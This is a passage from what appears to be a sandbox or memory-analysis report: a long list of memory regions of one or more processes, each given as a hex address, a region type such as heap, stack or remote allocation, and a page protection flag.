page read and write
|
||
|
1B4E9A3B000
|
heap
|
page read and write
|
||
|
514D000
|
stack
|
page read and write
|
||
|
1E16CD00000
|
heap
|
page read and write
|
||
|
32AF000
|
trusted library allocation
|
page read and write
|
||
|
6C1E000
|
stack
|
page read and write
|
||
|
1157000
|
trusted library allocation
|
page execute and read and write
|
||
|
1140000
|
trusted library allocation
|
page read and write
|
||
|
1E16CCCA000
|
heap
|
page read and write
|
||
|
7FFAACD80000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE90000
|
trusted library allocation
|
page read and write
|
||
|
156E000
|
stack
|
page read and write
|
||
|
1221000
|
heap
|
page read and write
|
||
|
33B2000
|
trusted library allocation
|
page read and write
|
||
|
5ACE000
|
stack
|
page read and write
|
||
|
11F0000
|
trusted library allocation
|
page read and write
|
||
|
1B480232000
|
trusted library allocation
|
page read and write
|
||
|
1E16CAB0000
|
trusted library allocation
|
page read and write
|
||
|
1150000
|
trusted library allocation
|
page read and write
|
||
|
558E000
|
stack
|
page read and write
|
||
|
FE06FFF000
|
stack
|
page read and write
|
||
|
12FE000
|
stack
|
page read and write
|
||
|
C733B7E000
|
unkown
|
page readonly
|
||
|
1E167729000
|
heap
|
page read and write
|
||
|
1B4E7A87000
|
heap
|
page read and write
|
||
|
568E000
|
stack
|
page read and write
|
||
|
5320000
|
heap
|
page read and write
|
||
|
7FFB226C1000
|
unkown
|
page execute read
|
||
|
1E16767B000
|
heap
|
page read and write
|
||
|
1B4815D9000
|
trusted library allocation
|
page read and write
|
||
|
1189000
|
heap
|
page read and write
|
||
|
679E000
|
stack
|
page read and write
|
||
|
1B4E9A62000
|
heap
|
page read and write
|
||
|
3011000
|
trusted library allocation
|
page read and write
|
||
|
1235000
|
heap
|
page read and write
|
||
|
7FFAACDB0000
|
trusted library allocation
|
page read and write
|
||
|
1E168340000
|
trusted library allocation
|
page read and write
|
||
|
1B4E7D45000
|
heap
|
page read and write
|
||
|
1E167F02000
|
heap
|
page read and write
|
||
|
586C000
|
trusted library allocation
|
page read and write
|
||
|
1B481B29000
|
trusted library allocation
|
page read and write
|
||
|
1E1686D0000
|
trusted library section
|
page readonly
|
||
|
6EE0D000
|
unkown
|
page read and write
|
||
|
1E167DC1000
|
trusted library allocation
|
page read and write
|
||
|
5380000
|
trusted library allocation
|
page read and write
|
||
|
5475A7F000
|
stack
|
page read and write
|
||
|
7FFB226E2000
|
unkown
|
page readonly
|
||
|
10F6000
|
stack
|
page read and write
|
||
|
1B480001000
|
trusted library allocation
|
page read and write
|
||
|
7037000
|
trusted library allocation
|
page read and write
|
||
|
1E16768F000
|
heap
|
page read and write
|
||
|
1E1685B0000
|
trusted library allocation
|
page read and write
|
||
|
6A2B000
|
heap
|
page read and write
|
||
|
1B4E9CA2000
|
heap
|
page read and write
|
||
|
7FFB226C1000
|
unkown
|
page execute read
|
||
|
3DC4000
|
trusted library allocation
|
page read and write
|
||
|
1B490001000
|
trusted library allocation
|
page read and write
|
||
|
FE06DFE000
|
stack
|
page read and write
|
||
|
3324000
|
trusted library allocation
|
page read and write
|
||
|
33DC000
|
trusted library allocation
|
page read and write
|
||
|
1630000
|
trusted library allocation
|
page read and write
|
||
|
7FFB226D6000
|
unkown
|
page readonly
|
||
|
6EDF0000
|
unkown
|
page readonly
|
||
|
2CA0000
|
heap
|
page execute and read and write
|
||
|
1580000
|
heap
|
page read and write
|
||
|
11A3000
|
heap
|
page read and write
|
||
|
55D2000
|
trusted library allocation
|
page read and write
|
||
|
11EE000
|
stack
|
page read and write
|
||
|
69EC000
|
heap
|
page read and write
|
||
|
31F3000
|
trusted library allocation
|
page read and write
|
||
|
1134000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD31000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD3A000
|
trusted library allocation
|
page read and write
|
||
|
5475AFD000
|
stack
|
page read and write
|
||
|
1747000
|
trusted library allocation
|
page execute and read and write
|
||
|
16F0000
|
heap
|
page read and write
|
||
|
992000
|
unkown
|
page readonly
|
||
|
343E000
|
trusted library allocation
|
page read and write
|
||
|
55F1000
|
trusted library allocation
|
page read and write
|
||
|
585E000
|
trusted library allocation
|
page read and write
|
||
|
1B4E9473000
|
trusted library allocation
|
page read and write
|
||
|
53D0000
|
trusted library allocation
|
page read and write
|
||
|
2F4F000
|
stack
|
page read and write
|
||
|
328C000
|
trusted library allocation
|
page read and write
|
||
|
1120000
|
heap
|
page read and write
|
||
|
538B000
|
trusted library allocation
|
page read and write
|
||
|
1E167613000
|
heap
|
page read and write
|
||
|
1E167702000
|
heap
|
page read and write
|
||
|
2E4E000
|
stack
|
page read and write
|
||
|
1B481B25000
|
trusted library allocation
|
page read and write
|
||
|
2C70000
|
trusted library allocation
|
page read and write
|
||
|
2FF6000
|
trusted library allocation
|
page read and write
|
||
|
1E16CD02000
|
heap
|
page read and write
|
||
|
7FFAACC30000
|
trusted library allocation
|
page read and write
|
||
|
55AE000
|
stack
|
page read and write
|
||
|
3202000
|
trusted library allocation
|
page read and write
|
||
|
1B4E93A0000
|
heap
|
page read and write
|
||
|
7FFB226C0000
|
unkown
|
page readonly
|
||
|
1E16CD0A000
|
heap
|
page read and write
|
||
|
3D9F000
|
stack
|
page read and write
|
||
|
7FFAACEE0000
|
trusted library allocation
|
page read and write
|
||
|
54759FE000
|
stack
|
page read and write
|
||
|
1120000
|
heap
|
page read and write
|
||
|
3245000
|
trusted library allocation
|
page read and write
|
||
|
1E168690000
|
trusted library section
|
page readonly
|
||
|
6EE0D000
|
unkown
|
page read and write
|
||
|
1B4E9A17000
|
heap
|
page read and write
|
||
|
7DF4C6700000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E16CC1F000
|
heap
|
page read and write
|
||
|
1B481D8D000
|
trusted library allocation
|
page read and write
|
||
|
1B4E9CD8000
|
heap
|
page read and write
|
||
|
5475EBA000
|
stack
|
page read and write
|
||
|
11D5000
|
heap
|
page read and write
|
||
|
1E16CBD0000
|
trusted library allocation
|
page read and write
|
||
|
166E000
|
stack
|
page read and write
|
||
|
5475D3F000
|
stack
|
page read and write
|
||
|
C7337FE000
|
stack
|
page read and write
|
||
|
3110000
|
trusted library allocation
|
page read and write
|
||
|
5C4E000
|
stack
|
page read and write
|
||
|
564A000
|
trusted library allocation
|
page read and write
|
||
|
3DCA000
|
trusted library allocation
|
page read and write
|
||
|
2C90000
|
trusted library allocation
|
page read and write
|
||
|
C733F7E000
|
unkown
|
page readonly
|
||
|
C73357E000
|
unkown
|
page readonly
|
||
|
28FCBBB2000
|
heap
|
page read and write
|
||
|
3DB5000
|
trusted library allocation
|
page read and write
|
||
|
563A000
|
trusted library allocation
|
page read and write
|
||
|
53A1000
|
trusted library allocation
|
page read and write
|
||
|
1E16CE20000
|
remote allocation
|
page read and write
|
||
|
13E4000
|
trusted library allocation
|
page read and write
|
||
|
1E16CC8A000
|
heap
|
page read and write
|
||
|
C732C7E000
|
unkown
|
page readonly
|
||
|
1710000
|
trusted library allocation
|
page read and write
|
||
|
1E167E00000
|
heap
|
page read and write
|
||
|
124D000
|
heap
|
page read and write
|
||
|
1B481755000
|
trusted library allocation
|
page read and write
|
||
|
C73377E000
|
unkown
|
page readonly
|
||
|
6EE0F000
|
unkown
|
page readonly
|
||
|
54B0000
|
trusted library allocation
|
page read and write
|
||
|
1760000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB8D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1440000
|
heap
|
page execute and read and write
|
||
|
C7348FE000
|
stack
|
page read and write
|
||
|
5690000
|
trusted library allocation
|
page read and write
|
||
|
C7334FE000
|
stack
|
page read and write
|
||
|
7FFAACE50000
|
trusted library allocation
|
page read and write
|
||
|
5770000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDA0000
|
trusted library allocation
|
page read and write
|
||
|
C733C7B000
|
stack
|
page read and write
|
||
|
1E16CCFA000
|
heap
|
page read and write
|
||
|
FE072FD000
|
stack
|
page read and write
|
||
|
1E16CCC0000
|
heap
|
page read and write
|
||
|
3239000
|
trusted library allocation
|
page read and write
|
||
|
504D000
|
stack
|
page read and write
|
||
|
39DF000
|
stack
|
page read and write
|
||
|
1B4E9A08000
|
heap
|
page read and write
|
||
|
9F1000
|
unkown
|
page readonly
|
||
|
5475F3E000
|
stack
|
page read and write
|
||
|
1B481CC8000
|
trusted library allocation
|
page read and write
|
||
|
FF0000
|
heap
|
page read and write
|
||
|
5610000
|
trusted library allocation
|
page read and write
|
||
|
5D3E000
|
stack
|
page read and write
|
||
|
1B4E93E0000
|
trusted library allocation
|
page read and write
|
||
|
5475C7D000
|
stack
|
page read and write
|
||
|
C73347E000
|
unkown
|
page readonly
|
||
|
583D000
|
stack
|
page read and write
|
||
|
C732F7C000
|
stack
|
page read and write
|
||
|
6CDE000
|
stack
|
page read and write
|
||
|
3284000
|
trusted library allocation
|
page read and write
|
||
|
3E4E000
|
trusted library allocation
|
page read and write
|
||
|
173A000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E16CC54000
|
heap
|
page read and write
|
||
|
5475B7E000
|
stack
|
page read and write
|
||
|
FE073FE000
|
stack
|
page read and write
|
||
|
3430000
|
trusted library allocation
|
page read and write
|
||
|
1E167E02000
|
heap
|
page read and write
|
||
|
111D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B4E7A5B000
|
heap
|
page read and write
|
||
|
57A0000
|
trusted library allocation
|
page read and write
|
||
|
3B1F000
|
stack
|
page read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
55D0000
|
trusted library allocation
|
page read and write
|
||
|
FE069FA000
|
stack
|
page read and write
|
||
|
1B4E7970000
|
heap
|
page read and write
|
||
|
5384000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC3C000
|
trusted library allocation
|
page execute and read and write
|
||
|
53F5000
|
trusted library allocation
|
page read and write
|
||
|
5C0E000
|
stack
|
page read and write
|
||
|
C73337B000
|
stack
|
page read and write
|
||
|
322E000
|
trusted library allocation
|
page read and write
|
||
|
1B490070000
|
trusted library allocation
|
page read and write
|
||
|
3DC7000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE60000
|
trusted library allocation
|
page read and write
|
||
|
C733E79000
|
stack
|
page read and write
|
||
|
1168000
|
heap
|
page read and write
|
||
|
1742000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD90000
|
trusted library allocation
|
page read and write
|
||
|
11DA000
|
heap
|
page read and write
|
||
|
1E167DF0000
|
trusted library allocation
|
page read and write
|
||
|
5890000
|
trusted library allocation
|
page read and write
|
||
|
56CE000
|
stack
|
page read and write
|
||
|
3B5E000
|
stack
|
page read and write
|
||
|
1E1675D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACEB0000
|
trusted library allocation
|
page read and write
|
||
|
5880000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C80000
|
heap
|
page execute and read and write
|
||
|
1B4E9980000
|
heap
|
page read and write
|
||
|
1E167673000
|
heap
|
page read and write
|
||
|
5CFD000
|
stack
|
page read and write
|
||
|
14D0000
|
heap
|
page read and write
|
||
|
5605000
|
trusted library allocation
|
page read and write
|
||
|
1E16CCE5000
|
heap
|
page read and write
|
||
|
C7338FE000
|
stack
|
page read and write
|
||
|
7FFAACB9B000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
|
116E000
|
stack
|
page read and write
|
||
|
1660000
|
trusted library allocation
|
page execute and read and write
|
||
|
1540000
|
trusted library allocation
|
page read and write
|
||
|
28FCBC0A000
|
heap
|
page read and write
|
||
|
3C9E000
|
stack
|
page read and write
|
||
|
1410000
|
heap
|
page read and write
|
||
|
3114000
|
trusted library allocation
|
page read and write
|
||
|
1E167F13000
|
heap
|
page read and write
|
||
|
3280000
|
trusted library allocation
|
page read and write
|
||
|
1E16CE20000
|
remote allocation
|
page read and write
|
||
|
5635000
|
trusted library allocation
|
page read and write
|
||
|
C73317C000
|
stack
|
page read and write
|
||
|
171D000
|
trusted library allocation
|
page execute and read and write
|
||
|
327C000
|
trusted library allocation
|
page read and write
|
||
|
55D4000
|
trusted library allocation
|
page read and write
|
||
|
69DE000
|
stack
|
page read and write
|
||
|
56E0000
|
trusted library allocation
|
page read and write
|
||
|
FF7000
|
heap
|
page read and write
|
||
|
32BC000
|
trusted library allocation
|
page read and write
|
||
|
5330000
|
trusted library section
|
page read and write
|
||
|
1B4E7A32000
|
heap
|
page read and write
|
||
|
4011000
|
trusted library allocation
|
page read and write
|
||
|
1B481B27000
|
trusted library allocation
|
page read and write
|
||
|
5DA2000
|
trusted library allocation
|
page read and write
|
||
|
6EE06000
|
unkown
|
page readonly
|
||
|
5D84000
|
trusted library allocation
|
page read and write
|
||
|
14F0000
|
heap
|
page read and write
|
||
|
1E16CA81000
|
trusted library allocation
|
page read and write
|
||
|
1B4901B3000
|
trusted library allocation
|
page read and write
|
||
|
563B000
|
trusted library allocation
|
page read and write
|
||
|
3E51000
|
trusted library allocation
|
page read and write
|
||
|
6FF6000
|
trusted library allocation
|
page read and write
|
||
|
38DE000
|
stack
|
page read and write
|
||
|
1E16765B000
|
heap
|
page read and write
|
||
|
1E167691000
|
heap
|
page read and write
|
||
|
1E1676A0000
|
heap
|
page read and write
|
||
|
7FFB226E5000
|
unkown
|
page readonly
|
||
|
1E167E15000
|
heap
|
page read and write
|
||
|
1450000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B481ADE000
|
trusted library allocation
|
page read and write
|
||
|
1246000
|
heap
|
page read and write
|
||
|
5475DB7000
|
stack
|
page read and write
|
||
|
7060000
|
trusted library allocation
|
page execute and read and write
|
||
|
57A5000
|
trusted library allocation
|
page read and write
|
||
|
74A0000
|
heap
|
page read and write
|
||
|
1407000
|
trusted library allocation
|
page execute and read and write
|
||
|
55DB000
|
trusted library allocation
|
page read and write
|
||
|
13E0000
|
heap
|
page read and write
|
||
|
5CBD000
|
stack
|
page read and write
|
||
|
32F8000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB90000
|
trusted library allocation
|
page read and write
|
||
|
1B481B21000
|
trusted library allocation
|
page read and write
|
||
|
5630000
|
trusted library allocation
|
page read and write
|
||
|
5344000
|
trusted library section
|
page read and write
|
||
|
C732E7E000
|
unkown
|
page readonly
|
||
|
2BA0000
|
trusted library allocation
|
page read and write
|
||
|
33AD000
|
trusted library allocation
|
page read and write
|
||
|
1E16CCE7000
|
heap
|
page read and write
|
||
|
2C5E000
|
stack
|
page read and write
|
||
|
3230000
|
heap
|
page read and write
|
||
|
3290000
|
trusted library allocation
|
page read and write
|
||
|
3288000
|
trusted library allocation
|
page read and write
|
||
|
1B4E9430000
|
heap
|
page execute and read and write
|
||
|
563E000
|
trusted library allocation
|
page read and write
|
||
|
2C95000
|
trusted library allocation
|
page read and write
|
||
|
28FCBB70000
|
heap
|
page read and write
|
||
|
1405000
|
heap
|
page read and write
|
||
|
1E16CCC2000
|
heap
|
page read and write
|
||
|
33E2000
|
trusted library allocation
|
page read and write
|
||
|
28FCBE15000
|
heap
|
page read and write
|
||
|
1B48008B000
|
trusted library allocation
|
page read and write
|
||
|
16CE000
|
stack
|
page read and write
|
||
|
990000
|
unkown
|
page readonly
|
||
|
7FFAACD40000
|
trusted library allocation
|
page execute and read and write
|
||
|
C32000
|
unkown
|
page readonly
|
||
|
5300000
|
trusted library allocation
|
page read and write
|
||
|
1745000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B4815F9000
|
trusted library allocation
|
page read and write
|
||
|
3120000
|
heap
|
page execute and read and write
|
||
|
31E2000
|
trusted library allocation
|
page read and write
|
||
|
1E16CBB0000
|
trusted library allocation
|
page read and write
|
||
|
547597E000
|
stack
|
page read and write
|
||
|
565D000
|
trusted library allocation
|
page read and write
|
||
|
3DDC000
|
stack
|
page read and write
|
||
|
1B4E79D7000
|
heap
|
page read and write
|
||
|
53F0000
|
trusted library allocation
|
page read and write
|
||
|
13DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
13F6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1670000
|
heap
|
page read and write
|
||
|
1E16CB50000
|
trusted library allocation
|
page read and write
|
||
|
FCB000
|
stack
|
page read and write
|
||
|
174B000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB226C0000
|
unkown
|
page readonly
|
||
|
116E000
|
heap
|
page read and write
|
||
|
1B490010000
|
trusted library allocation
|
page read and write
|
||
|
1330000
|
heap
|
page read and write
|
||
|
5870000
|
heap
|
page execute and read and write
|
||
|
C7336FE000
|
stack
|
page read and write
|
||
|
1E167695000
|
heap
|
page read and write
|
||
|
5490000
|
heap
|
page read and write
|
||
|
1E16CBC0000
|
trusted library allocation
|
page read and write
|
||
|
C73307E000
|
unkown
|
page readonly
|
||
|
68DE000
|
stack
|
page read and write
|
||
|
5640000
|
heap
|
page read and write
|
||
|
1770000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACD20000
|
trusted library allocation
|
page read and write
|
||
|
321A000
|
trusted library allocation
|
page read and write
|
||
|
FE06CFE000
|
stack
|
page read and write
|
||
|
56F3000
|
heap
|
page read and write
|
||
|
5780000
|
trusted library allocation
|
page read and write
|
||
|
1B4815DD000
|
trusted library allocation
|
page read and write
|
||
|
2DB1000
|
trusted library allocation
|
page read and write
|
||
|
1E1674A0000
|
heap
|
page read and write
|
||
|
7FFB226D6000
|
unkown
|
page readonly
|
||
|
1E16CAA0000
|
trusted library allocation
|
page read and write
|
||
|
1E167622000
|
heap
|
page read and write
|
||
|
28FCBD70000
|
heap
|
page read and write
|
||
|
1E16CAD9000
|
trusted library allocation
|
page read and write
|
||
|
5476E4B000
|
stack
|
page read and write
|
||
|
C732977000
|
stack
|
page read and write
|
||
|
5DA5000
|
trusted library allocation
|
page read and write
|
||
|
1E16CCFC000
|
heap
|
page read and write
|
||
|
338B000
|
trusted library allocation
|
page read and write
|
||
|
1429000
|
heap
|
page read and write
|
||
|
1E16CC4F000
|
heap
|
page read and write
|
||
|
1430000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
1B4E9CCE000
|
heap
|
page read and write
|
||
|
1E16CC00000
|
heap
|
page read and write
|
||
|
3DB1000
|
trusted library allocation
|
page read and write
|
||
|
C733A7E000
|
unkown
|
page readonly
|
||
|
5D7E000
|
stack
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
C73397E000
|
unkown
|
page readonly
|
||
|
574E000
|
stack
|
page read and write
|
||
|
5310000
|
trusted library allocation
|
page read and write
|
||
|
1110000
|
heap
|
page read and write
|
||
|
1B4E9360000
|
heap
|
page read and write
|
||
|
63AF000
|
stack
|
page read and write
|
||
|
1B4E94D0000
|
heap
|
page read and write
|
||
|
5346000
|
trusted library section
|
page read and write
|
||
|
13E8000
|
heap
|
page read and write
|
||
|
1E16CAC0000
|
trusted library allocation
|
page read and write
|
||
|
1110000
|
trusted library allocation
|
page read and write
|
||
|
1E16CC2C000
|
heap
|
page read and write
|
||
|
5850000
|
trusted library allocation
|
page read and write
|
||
|
338F000
|
trusted library allocation
|
page read and write
|
||
|
3294000
|
trusted library allocation
|
page read and write
|
||
|
1460000
|
heap
|
page read and write
|
||
|
18E0000
|
heap
|
page read and write
|
||
|
1714000
|
trusted library allocation
|
page read and write
|
||
|
1E16767D000
|
heap
|
page read and write
|
||
|
C733D7E000
|
unkown
|
page readonly
|
||
|
41C6000
|
trusted library allocation
|
page read and write
|
||
|
2C64000
|
trusted library allocation
|
page read and write
|
||
|
1E16CAC0000
|
trusted library allocation
|
page read and write
|
||
|
1B4E9AE0000
|
heap
|
page execute and read and write
|
||
|
1E167F1A000
|
heap
|
page read and write
|
||
|
2C67000
|
trusted library allocation
|
page read and write
|
||
|
655E000
|
stack
|
page read and write
|
||
|
11A5000
|
heap
|
page read and write
|
||
|
4131000
|
trusted library allocation
|
page read and write
|
||
|
180D000
|
stack
|
page read and write
|
||
|
1B4E7990000
|
heap
|
page read and write
|
||
|
7FFAACD62000
|
trusted library allocation
|
page read and write
|
||
|
5540000
|
heap
|
page execute and read and write
|
||
|
1850000
|
trusted library allocation
|
page read and write
|
||
|
1B481607000
|
trusted library allocation
|
page read and write
|
||
|
1E1686E0000
|
trusted library section
|
page readonly
|
||
|
1E16CBD0000
|
trusted library allocation
|
page read and write
|
||
|
1337000
|
stack
|
page read and write
|
||
|
5475FBE000
|
stack
|
page read and write
|
||
|
598E000
|
stack
|
page read and write
|
||
|
539E000
|
trusted library allocation
|
page read and write
|
||
|
563D000
|
trusted library allocation
|
page read and write
|
||
|
3EDC000
|
stack
|
page read and write
|
||
|
1E16CB50000
|
trusted library allocation
|
page read and write
|
||
|
3322000
|
trusted library allocation
|
page read and write
|
||
|
1B4E99BB000
|
heap
|
page read and write
|
||
|
5774000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB84000
|
trusted library allocation
|
page read and write
|
||
|
3452000
|
trusted library allocation
|
page read and write
|
||
|
28FCBC10000
|
heap
|
page read and write
|
||
|
2C60000
|
trusted library allocation
|
page read and write
|
||
|
1E1684A0000
|
trusted library allocation
|
page read and write
|
||
|
1E16E000000
|
heap
|
page read and write
|
||
|
115B000
|
trusted library allocation
|
page execute and read and write
|
||
|
5590000
|
trusted library section
|
page read and write
|
||
|
579D000
|
heap
|
page read and write
|
||
|
1E16CAB0000
|
trusted library allocation
|
page read and write
|
||
|
6EDF1000
|
unkown
|
page execute read
|
||
|
162E000
|
stack
|
page read and write
|
||
|
564E000
|
trusted library allocation
|
page read and write
|
||
|
DAB000
|
stack
|
page read and write
|
||
|
1B4E9C60000
|
heap
|
page read and write
|
||
|
69E0000
|
heap
|
page read and write
|
||
|
1B4E9C70000
|
heap
|
page read and write
|
||
|
7FFAACD70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BD0000
|
heap
|
page read and write
|
||
|
EF6000
|
stack
|
page read and write
|
||
|
137D000
|
stack
|
page read and write
|
||
|
379E000
|
stack
|
page read and write
|
||
|
B2B000
|
stack
|
page read and write
|
||
|
BEE000
|
stack
|
page read and write
|
||
|
4015000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACCA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E16CC61000
|
heap
|
page read and write
|
||
|
5476C4E000
|
stack
|
page read and write
|
||
|
2C98000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC36000
|
trusted library allocation
|
page read and write
|
||
|
6A22000
|
heap
|
page read and write
|
||
|
17CE000
|
stack
|
page read and write
|
||
|
1E1674C0000
|
heap
|
page read and write
|
||
|
7FFB226E2000
|
unkown
|
page readonly
|
||
|
2C1E000
|
stack
|
page read and write
|
||
|
1380000
|
heap
|
page read and write
|
||
|
1570000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B4E7A59000
|
heap
|
page read and write
|
||
|
1E16CCC7000
|
heap
|
page read and write
|
||
|
7FFAACEC0000
|
trusted library allocation
|
page read and write
|
||
|
5940000
|
heap
|
page read and write
|
||
|
1113000
|
trusted library allocation
|
page execute and read and write
|
||
|
5779000
|
trusted library allocation
|
page read and write
|
||
|
120E000
|
heap
|
page read and write
|
||
|
1E1686A0000
|
trusted library section
|
page readonly
|
||
|
1B4E94E0000
|
heap
|
page read and write
|
||
|
C73327E000
|
unkown
|
page readonly
|
||
|
5790000
|
heap
|
page read and write
|
||
|
7FFAACC66000
|
trusted library allocation
|
page execute and read and write
|
||
|
C732D7B000
|
stack
|
page read and write
|
||
|
1713000
|
trusted library allocation
|
page execute and read and write
|
||
|
6E9E000
|
stack
|
page read and write
|
||
|
7FFAACE20000
|
trusted library allocation
|
page read and write
|
||
|
32A2000
|
trusted library allocation
|
page read and write
|
||
|
5476BCE000
|
stack
|
page read and write
|
||
|
13DA000
|
heap
|
page read and write
|
||
|
7FFAACE80000
|
trusted library allocation
|
page read and write
|
||
|
28FCBB60000
|
heap
|
page read and write
|
||
|
1E16CC42000
|
heap
|
page read and write
|
||
|
675E000
|
stack
|
page read and write
|
||
|
13FA000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E16762B000
|
heap
|
page read and write
|
||
|
1380000
|
heap
|
page read and write
|
||
|
1146000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B4E7A1A000
|
heap
|
page read and write
|
||
|
1E16CC8C000
|
heap
|
page read and write
|
||
|
1B4E9470000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDE0000
|
trusted library allocation
|
page read and write
|
||
|
52CE000
|
stack
|
page read and write
|
||
|
3306000
|
trusted library allocation
|
page read and write
|
||
|
544D000
|
stack
|
page read and write
|
||
|
13B8000
|
heap
|
page read and write
|
||
|
C7323FB000
|
stack
|
page read and write
|
||
|
13F0000
|
trusted library allocation
|
page read and write
|
||
|
C73407E000
|
stack
|
page read and write
|
||
|
7020000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC40000
|
trusted library allocation
|
page execute and read and write
|
||
|
31E5000
|
trusted library allocation
|
page read and write
|
||
|
54AE000
|
stack
|
page read and write
|
||
|
3274000
|
trusted library allocation
|
page read and write
|
||
|
1B4E9AE7000
|
heap
|
page execute and read and write
|
||
|
1E1676A2000
|
heap
|
page read and write
|
||
|
689E000
|
stack
|
page read and write
|
||
|
5670000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB83000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E1675E0000
|
trusted library section
|
page read and write
|
||
|
123A000
|
stack
|
page read and write
|
||
|
1700000
|
trusted library allocation
|
page read and write
|
||
|
5840000
|
trusted library allocation
|
page execute and read and write
|
||
|
1780000
|
heap
|
page read and write
|
||
|
41BD000
|
trusted library allocation
|
page read and write
|
||
|
53C0000
|
trusted library allocation
|
page read and write
|
||
|
1550000
|
heap
|
page read and write
|
||
|
D1C000
|
unkown
|
page readonly
|
||
|
620E000
|
stack
|
page read and write
|
||
|
1E1686C0000
|
trusted library section
|
page readonly
|
||
|
14F5000
|
heap
|
page read and write
|
||
|
139F000
|
stack
|
page read and write
|
||
|
41F1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE10000
|
trusted library allocation
|
page read and write
|
||
|
6C9F000
|
stack
|
page read and write
|
||
|
5620000
|
trusted library allocation
|
page read and write
|
||
|
28FCBE10000
|
heap
|
page read and write
|
||
|
1E167641000
|
heap
|
page read and write
|
||
|
665F000
|
stack
|
page read and write
|
||
|
590E000
|
stack
|
page read and write
|
||
|
1E1676B7000
|
heap
|
page read and write
|
||
|
7FFAACB82000
|
trusted library allocation
|
page read and write
|
||
|
645E000
|
stack
|
page read and write
|
||
|
1425000
|
heap
|
page read and write
|
||
|
1736000
|
trusted library allocation
|
page execute and read and write
|
||
|
1196000
|
heap
|
page read and write
|
||
|
13B0000
|
heap
|
page read and write
|
||
|
1860000
|
heap
|
page read and write
|
||
|
1E167F00000
|
heap
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
C7339FE000
|
stack
|
page read and write
|
||
|
1E16CC5A000
|
heap
|
page read and write
|
||
|
577E000
|
trusted library allocation
|
page read and write
|
||
|
4159000
|
trusted library allocation
|
page read and write
|
||
|
53CE000
|
trusted library allocation
|
page read and write
|
||
|
1E168091000
|
trusted library allocation
|
page read and write
|
||
|
C73497E000
|
unkown
|
page readonly
|
||
|
323D000
|
trusted library allocation
|
page read and write
|
||
|
BA0000
|
heap
|
page read and write
|
||
|
1E16CBE0000
|
trusted library allocation
|
page read and write
|
||
|
15EE000
|
stack
|
page read and write
|
||
|
1B481761000
|
trusted library allocation
|
page read and write
|
||
|
32E9000
|
trusted library allocation
|
page read and write
|
||
|
5869000
|
trusted library allocation
|
page read and write
|
||
|
5860000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
1B4EA050000
|
heap
|
page read and write
|
||
|
1B481603000
|
trusted library allocation
|
page read and write
|
||
|
547613B000
|
stack
|
page read and write
|
||
|
1B4E9D40000
|
heap
|
page read and write
|
||
|
1E16CE20000
|
remote allocation
|
page read and write
|
||
|
1248000
|
heap
|
page read and write
|
||
|
7FFAACE30000
|
trusted library allocation
|
page read and write
|
||
|
C732B7E000
|
stack
|
page read and write
|
||
|
28FCDA90000
|
heap
|
page read and write
|
||
|
1E167713000
|
heap
|
page read and write
|
||
|
310E000
|
stack
|
page read and write
|
||
|
5636000
|
trusted library allocation
|
page read and write
|
||
|
5DA0000
|
trusted library allocation
|
page read and write
|
||
|
1E16CD05000
|
heap
|
page read and write
|
||
|
5651000
|
trusted library allocation
|
page read and write
|
||
|
5867000
|
trusted library allocation
|
page read and write
|
||
|
5476B8D000
|
stack
|
page read and write
|
||
|
13D4000
|
trusted library allocation
|
page read and write
|
||
|
14D6000
|
heap
|
page read and write
|
||
|
1E16CA60000
|
trusted library allocation
|
page read and write
|
||
|
1B4E7A12000
|
heap
|
page read and write
|
||
|
7FFB226E0000
|
unkown
|
page read and write
|
||
|
17CE000
|
stack
|
page read and write
|
||
|
C73437E000
|
unkown
|
page readonly
|
||
|
3278000
|
trusted library allocation
|
page read and write
|
||
|
1B4E7D40000
|
heap
|
page read and write
|
||
|
1E16CAC4000
|
trusted library allocation
|
page read and write
|
||
|
FE074FF000
|
stack
|
page read and write
|
||
|
7040000
|
trusted library allocation
|
page read and write
|
||
|
7050000
|
trusted library allocation
|
page read and write
|
||
|
56F0000
|
heap
|
page read and write
|
||
|
1B4E7960000
|
heap
|
page read and write
|
||
|
5990000
|
heap
|
page read and write
|
||
|
5475CF9000
|
stack
|
page read and write
|
||
|
5610000
|
heap
|
page read and write
|
||
|
5475BFD000
|
stack
|
page read and write
|
||
|
5628000
|
trusted library allocation
|
page read and write
|
||
|
1B4E93C0000
|
trusted library allocation
|
